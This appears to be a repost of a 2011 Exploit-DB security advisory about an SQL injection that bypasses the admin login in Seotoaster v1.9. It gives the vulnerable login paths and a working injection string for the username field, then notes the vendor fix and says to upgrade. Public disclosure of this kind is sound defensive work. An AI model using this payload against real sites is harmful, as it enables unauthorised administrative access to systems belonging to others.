Seotoaster – SQL Injection

• Exploit Database
• 111 阅读

• 作者： Stefan Schurtz
  日期： 2011-12-16
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/18246/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44

  ################################################################################# # Advisory: Seotoaster SQL-Injection Admin Login Bypass # Author: Stefan Schurtz # Contact: sschurtz@t-online.de # Affected Software: Successfully tested on Seotoaster v.1.9 # Vendor URL: http://www.seotoaster.com/ # Vendor Status: fixed #################################################################################   ========================== Vulnerability Description ==========================   Seotoaster v.1.9 is prone to an SQL-Injection which bypass the admin login   ================== PoC-Exploit ==================   http://<target>/seotoaster/go or http://<target>/go   User: &apos; or 1=1)# PW: notimportant   ========= Solution =========   Upgrade to the latest version   ======== Credits ========   Vulnerabilitiy found and advisory written by Stefan Schurtz   =========== References ===========   http://secunia.com/advisories/46881/